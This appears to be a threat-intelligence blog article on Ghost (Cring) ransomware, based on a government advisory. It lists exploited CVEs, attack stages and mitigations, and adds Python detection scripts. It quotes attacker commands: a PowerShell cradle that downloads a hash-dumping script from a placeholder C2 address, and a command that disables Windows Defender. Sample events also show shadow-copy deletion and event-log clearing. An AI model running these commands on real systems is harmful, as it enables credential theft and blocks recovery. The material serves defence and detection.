Ghost (Cring) ransomware, also known as Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture, is a significant cybersecurity threat that has impacted organizations globally since its emergence in early 2021. This ransomware strain, attributed to threat actors located in China, leverages known vulnerabilities in internet-facing services to gain initial access, encrypt data, and extort victims for financial gain. The rapid deployment of the ransomware following initial compromise, coupled with the group's indiscriminate targeting across various sectors and geographies, makes Ghost (Cring) a particularly dangerous adversary. A joint Cybersecurity Advisory (CSA) from the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) highlights the severity of this threat and provides crucial guidance for network defenders.
Ghost (Cring) ransomware was first observed in early 2021, exploiting unpatched vulnerabilities in internet-facing applications. The threat actors behind Ghost (Cring) are believed to be located in China, operating with a primary motivation of financial gain. The ransomware's rapid evolution is characterized by frequent changes in payloads, ransom notes, file extensions, and contact email addresses, contributing to difficulties in consistent attribution. This agility suggests an ongoing development effort and a commitment to evading detection.
The association with multiple ransomware family names (Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture) indicates potential rebranding efforts, code sharing, or collaboration within the cybercriminal ecosystem. While not explicitly linked to a specific Advanced Persistent Threat (APT) group, the techniques and targeting patterns align with financially motivated cybercrime operations.
The Ghost (Cring) ransomware group operates with a distinct set of tactics, techniques, and procedures (TTPs), characterized by speed and exploitation of known vulnerabilities. Key aspects of their modus operandi include:
Initial Access: The primary attack vector is exploiting known vulnerabilities in public-facing applications. This circumvents security measures that focus on phishing or malware attachments. Specific vulnerabilities targeted include:
* Fortinet FortiOS: CVE-2018-13379 (a directory traversal vulnerability in the SSL VPN web portal).
* Adobe ColdFusion: CVE-2010-2861 and CVE-2009-3960 (directory traversal vulnerabilities).
* Microsoft SharePoint: CVE-2019-0604 (a remote code execution vulnerability).
* Microsoft Exchange (ProxyShell): CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207 (remote code execution vulnerabilities).
Execution: Once inside the network, the threat actors use various methods to execute their payloads:
* Web Shells: Uploading web shells (such as a variant of Chunk-Proxy) to compromised servers for persistent access.
* Windows Command Prompt & PowerShell: Utilizing built-in Windows tools for downloading and executing additional malware, including Cobalt Strike Beacon.
* Cobalt Strike Beacon: A commercial penetration testing tool used by the threat actor.
Persistence: While Ghost (Cring) does not prioritize long-term persistence, they employ several techniques to maintain access, typically operating within the network for just a few days:
* New Account Creation: Sporadically creating new local or domain accounts.
* Password Changes: Modifying passwords for existing accounts.
* Web Shells (2024): Increasingly, web shells provide a persistent backdoor.
Privilege Escalation: The group leverages various tools and techniques to escalate privileges:
* Cobalt Strike: Built-in functions to steal process tokens and impersonate the SYSTEM user.
* Open-Source Tools: Utilizing tools like SharpZeroLogon, SharpGPPPass, BadPotato, and GodPotato to exploit known privilege escalation vulnerabilities.
Credential Access: Accessing credentials is a key step for lateral movement and further compromise:
* Cobalt Strike "hashdump": Using Cobalt Strike's built-in functionality to extract password hashes.
* Mimikatz: Employing the well-known Mimikatz tool for credential dumping.
* PowerShell Commands to get password hashes: powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http[:]//<C2 SERVER IP>/b'); Get-PassHashes"
Defense Evasion: The group actively attempts to evade detection and disable security measures:
* Antivirus Disabling: Specifically targeting and disabling Windows Defender using PowerShell commands. Example: Set-MpPreference -DisableRealtimeMonitoring $true
* AV Checking: Listing running processes to check for antivirus software.
Discovery: Gathering information about the compromised network is crucial for lateral movement:
* Cobalt Strike Commands: Using Cobalt Strike for domain account discovery.
* Open-Source Tools: Employing tools like SharpShares (for network share discovery), Ladon 911, and SharpNBTScan (for remote system discovery).
* Network Share Discovery: SharpShares.exe
Lateral Movement: Spreading across the network is essential for maximizing the impact of the ransomware:
* WMIC: Utilizing Windows Management Instrumentation Command-line (WMIC) to run PowerShell commands on other systems, often to deploy Cobalt Strike.
* Base64 Encoded PowerShell: Using encoded PowerShell commands to execute Cobalt Strike in memory, evading detection.
* Abandonment: If lateral movement attempts fail, the attackers often abandon the attack, indicating a focus on efficiency and avoiding detection.
Exfiltration: While not the primary focus, data exfiltration does occur:
* Ransom Notes: Claims of data exfiltration are made in ransom notes, though the actual amount of data stolen is often limited.
* Exfiltration Methods: Limited use of Cobalt Strike Team Servers, Mega.nz, and web shells for exfiltration.
Command and Control (C2): Communication with the attackers' infrastructure is maintained through:
* Cobalt Strike Beacon & Team Servers: Primarily using Cobalt Strike over HTTP/HTTPS.
* Direct IP Referencing: Directly referencing C2 server IP addresses, rarely registering domains.
* Encrypted Email: Utilizing encrypted email services (Tutanota, Skiff, ProtonMail, Onionmail, Mailfence) for communication with victims.
* TOX IDs: Used in ransom notes starting around August 2024.
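The C2 traits above (Beacon over HTTP/HTTPS, servers referenced by bare IP rather than a registered domain) can be hunted in web proxy logs. The following is an added Python example, not code from the advisory or this article; it goes slightly beyond the text by also scoring the fixed-interval check-in pattern typical of a Beacon. The log format, sample lines, IP addresses and thresholds are constructed assumptions.

```python
import ipaddress
import statistics
from datetime import datetime
from urllib.parse import urlsplit

# Constructed proxy log (not real telemetry): "<ISO time> <client> <method> <url> <user-agent>"
PROXY_LOG = """\
2025-01-15T10:00:00 10.20.5.17 GET http://203.0.113.10/updates.rss Mozilla/5.0 (Windows NT 10.0; Win64; x64)
2025-01-15T10:01:00 10.20.5.17 GET http://203.0.113.10/updates.rss Mozilla/5.0 (Windows NT 10.0; Win64; x64)
2025-01-15T10:02:01 10.20.5.17 GET http://203.0.113.10/updates.rss Mozilla/5.0 (Windows NT 10.0; Win64; x64)
2025-01-15T10:03:00 10.20.5.17 GET http://203.0.113.10/updates.rss Mozilla/5.0 (Windows NT 10.0; Win64; x64)
2025-01-15T10:00:12 10.20.5.31 GET https://www.example.com/news Mozilla/5.0 (Windows NT 10.0; Win64; x64)
2025-01-15T10:05:30 10.20.5.42 GET http://198.51.100.7/b Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1
"""

def is_bare_ip_host(url):
    """True when the URL addresses the server by IP literal instead of a domain name."""
    try:
        ipaddress.ip_address(urlsplit(url).hostname or "")
        return True
    except ValueError:
        return False

def interval_regularity(timestamps):
    """Coefficient of variation of the gaps between requests (low = beacon-like); None if < 3 gaps."""
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    if len(gaps) < 3 or statistics.mean(gaps) == 0:
        return None
    return statistics.pstdev(gaps) / statistics.mean(gaps)

def find_c2_candidates(log_text, max_cv=0.25):
    """Return (client, host, reasons) for client/host pairs showing at least two C2 indicators."""
    sessions = {}  # (client, host) -> [(timestamp, url, user_agent), ...]
    for line in log_text.splitlines():
        ts, client, _method, url, ua = line.split(" ", 4)
        sessions.setdefault((client, urlsplit(url).hostname), []).append((datetime.fromisoformat(ts), url, ua))
    findings = []
    for (client, host), reqs in sessions.items():
        reasons = []
        if is_bare_ip_host(reqs[0][1]):
            reasons.append("bare_ip_host")          # direct IP referencing, no registered domain
        cv = interval_regularity([r[0] for r in reqs])
        if cv is not None and cv < max_cv:
            reasons.append("regular_beaconing")     # fixed-interval check-ins typical of a Beacon
        if any("WindowsPowerShell" in r[2] for r in reqs):
            reasons.append("powershell_user_agent")  # download cradle / in-memory stager traffic
        if len(reasons) >= 2:                        # a bare IP alone is too noisy to alert on
            findings.append((client, host, reasons))
    return findings
```

Tune max_cv to the jitter your environment tolerates; a real Beacon with a large configured jitter will score higher than the constructed sample.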
Impact and Encryption: The final stage involves encrypting data and demanding a ransom:
* Ransomware Executables: Using various executables, including Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe.
* Encryption Scope: Encrypting specific directories or entire systems.
* File Extension Exclusion: Excluding certain file extensions and system folders to maintain system stability for ransom payment.
* System Recovery Inhibition: Clearing Windows Event Logs, disabling Volume Shadow Copy Service, and deleting shadow copies to hinder recovery efforts.
* Ransom Demands: Demands range from tens to hundreds of thousands of dollars in cryptocurrency.
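Several of the behaviours listed above leave distinctive process command lines: the Set-MpPreference call under Defense Evasion, the WebClient download cradle under Credential Access, WMIC-launched encoded PowerShell under Lateral Movement, and the shadow-copy and event-log clearing under Impact. The following is an added Python example, not code from the advisory or this article, that runs detection rules over constructed process-creation events and decodes -EncodedCommand payloads (PowerShell's UTF-16LE base64 convention) before matching. Rule names, sample hosts, users and the 203.0.113.10 address are constructed assumptions.

```python
import base64
import re

# Detection rules for the behaviours above; each is checked against the raw command line and any decoded -EncodedCommand payload.
RULES = [
    ("defender_realtime_disabled", re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$true", re.I)),
    ("download_cradle", re.compile(r"Net\.WebClient\)\.DownloadString\(", re.I)),
    ("wmic_remote_process_create", re.compile(r"\bwmic\b.*/node:.*\bprocess\s+call\s+create\b", re.I)),
    ("shadow_copies_deleted", re.compile(r"\bvssadmin\b.*\bdelete\s+shadows\b", re.I)),
    ("event_log_cleared", re.compile(r"\bwevtutil\s+cl\b", re.I)),
]
ENC_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (PowerShell expects UTF-16LE base64), or None."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None

def analyze(cmdline):
    """Return the names of every rule that fires on one process command line."""
    hits = []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("encoded_powershell")
    for text in (cmdline, decoded or ""):
        for name, pattern in RULES:
            if name not in hits and pattern.search(text):
                hits.append(name)
    return hits

def scan(events):
    """Run the rules over (host, user, cmdline) events and return those that fire."""
    results = [(host, user, analyze(cmd)) for host, user, cmd in events]
    return [r for r in results if r[2]]

# Constructed sample process-creation events (host, user, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("srv-exch01", "NT AUTHORITY\\SYSTEM",
     "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/b'); Get-PassHashes\""),
    ("srv-file02", "CORP\\svc_app", 'wmic /node:"ws-hr03" process call create "powershell -enc '
     + base64.b64encode("Set-MpPreference -DisableRealtimeMonitoring $true".encode("utf-16-le")).decode() + '"'),
    ("ws-hr03", "CORP\\jdoe", "vssadmin delete shadows /all /quiet"),
    ("ws-hr03", "CORP\\jdoe", "wevtutil cl Security"),
    ("ws-ops01", "CORP\\admin", "powershell -c Get-Service -Name Spooler"),
]
```

Feed scan() with Sysmon Event ID 1 or Windows 4688 command lines (with command-line auditing enabled) to apply the same rules to real telemetry.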
Ghost (Cring) ransomware exhibits a broad and indiscriminate targeting pattern, affecting organizations across diverse sectors and geographic locations. This opportunistic approach suggests that the threat actors prioritize exploiting readily available vulnerabilities over targeting specific industries or regions. Victims have been reported in over 70 countries, including China itself.
Key sectors impacted include:
Critical Infrastructure: This includes organizations providing essential services, highlighting the potential for significant societal disruption.
Education: Schools and universities have been targeted, disrupting educational operations.
Healthcare: Hospitals and healthcare providers are vulnerable, posing risks to patient care and data privacy.
Government: Government networks have been compromised, potentially impacting public services and national security.
Religious Institutions: Organizations with lower security capacity than large businesses.
Technology/Manufacturing: Disruption to production and supply chains.
Small and Medium-Sized Businesses (SMBs): SMBs are often targeted due to potentially weaker security postures.
Retail (Especially E-commerce): Targets payment processing systems and customer data, disrupting sales and damaging consumer trust.
Financial Institutions: Targets customer and transaction data.
The motivation behind Ghost (Cring) is primarily financial gain. The ransom demands vary significantly, indicating a flexible approach to extortion based on the perceived value of the compromised data or the victim's ability to pay. Because the targeting is so broad, defenders need robust security logging and monitoring.
Several attack campaigns, attributed to the Ghost (Cring) threat actor, underline its ongoing threat.
Early 2021 - Emergence: Ghost (Cring) ransomware attacks begin, exploiting vulnerabilities in internet-facing applications. The attacks are characterized by rapid deployment and a focus on encryption.
Ongoing Activity (2021-2025): The ransomware continues to be active, with ongoing investigations by the FBI and CISA as recently as January 2025. This indicates a persistent and evolving threat. The group consistently rotates payloads, file extensions, ransom notes, and email addresses.
ProxyShell Exploitation (2021): Ghost (Cring) actors leverage the ProxyShell vulnerabilities in Microsoft Exchange servers to gain initial access, highlighting their ability to quickly adopt newly disclosed exploits.
Blue Yonder (November 2024): An attack on this major provider of supply chain management solutions caused major disruption.
Exploitation of Cleo Software Vulnerabilities: Vulnerabilities in Cleo's file transfer products allowed attackers to execute remote code and steal sensitive data from affected organizations.
It's important to note that this is not an exhaustive list, and the group likely conducts numerous smaller, unreported attacks. The widespread geographic distribution and diverse range of targeted sectors further underscore the ongoing risk posed by Ghost (Cring). Understanding indicators of compromise is vital in detecting such attacks.
Protecting against Ghost (Cring) ransomware requires a multi-layered approach that focuses on prevention, detection, and response. Given the group's reliance on exploiting known vulnerabilities, the following measures are crucial:
Patch Management: This is the most critical defense. Implement a robust and timely patching process for all operating systems, software, and firmware. Prioritize patching internet-facing applications, especially those with known vulnerabilities exploited by Ghost (Cring) (Fortinet, Adobe ColdFusion, Microsoft Exchange, SharePoint). A good patch management strategy can make all the difference.
Vulnerability Scanning: Regularly scan your network for vulnerabilities, particularly on internet-facing systems. This helps identify and address weaknesses before they can be exploited.
Network Segmentation: Implement network segmentation to limit the lateral movement of attackers within your network. This can prevent a single compromised system from impacting the entire organization.
Multi-Factor Authentication (MFA): Enforce phishing-resistant MFA for all privileged accounts and email accounts. This adds a crucial layer of security, even if credentials are stolen.
User Training: Conduct regular security awareness training to educate users about phishing attacks, social engineering, and other common attack vectors.
PowerShell Monitoring: Monitor for unauthorized or suspicious PowerShell activity. Implement least privilege principles to restrict PowerShell execution where possible.
Application Allowlisting: Implement application allowlisting to prevent unauthorized software from running on your systems. This can help block the execution of ransomware payloads.
Script Allowlisting: Similarly, restrict the execution of unauthorized scripts.
Network Traffic Allowlisting: Control network traffic to limit communication with known malicious IP addresses and domains.
Abnormal Activity Monitoring: Implement robust monitoring and alerting systems to detect and investigate unusual network traffic, user activity, and system changes.
Limit Service Exposure: Disable unused ports and services (e.g., RDP, FTP, SMB) on internet-facing systems. Restrict access to necessary services using VPNs and firewalls.
Enhance Email Security: Implement strong email filtering to block malicious attachments and links. Utilize email security protocols like DMARC, DKIM, and SPF to prevent email spoofing. Understanding SPF is critical in preventing such attacks.
Backups: Maintain regular, offline, and tested backups of all critical data. Ensure backups are segmented from the network and cannot be encrypted by ransomware.
Incident Response Plan: Develop and regularly test an incident response plan to ensure a coordinated and effective response to a ransomware attack. A solid cyber incident response plan is essential for minimizing damage.
AI-Powered Threat Detection: Explore and utilize AI-powered detection capabilities that can surface subtle attacker behavior.
Ghost (Cring) ransomware represents a significant and ongoing threat to organizations worldwide. The group's reliance on exploiting known vulnerabilities, coupled with its rapid deployment of ransomware and use of advanced evasion techniques, makes it a formidable adversary. By prioritizing vulnerability patching, implementing robust security controls, and fostering a culture of security awareness, organizations can significantly reduce their risk of falling victim to Ghost (Cring) and other similar ransomware threats. The joint advisory from CISA, FBI, and MS-ISAC underscores the importance of proactive cybersecurity measures and the need for continued vigilance in the face of evolving cyber threats. The focus on fundamental security practices (patching, backups, MFA, segmentation, and training) remains the most effective defense against this and many other ransomware families. Considering Zero Trust Security models can add an additional layer of defense. Restricting remote access to internal services through a VPN, as noted above, offers further protection.
Arun KL is a cybersecurity professional with 15+ years of experience in IT infrastructure, cloud security, vulnerability management, Penetration Testing, security operations, and incident response. He is adept at designing and implementing robust security solutions to safeguard systems and data. Arun holds multiple industry certifications including CCNA, CCNA Security, RHCE, CEH, and AWS Security.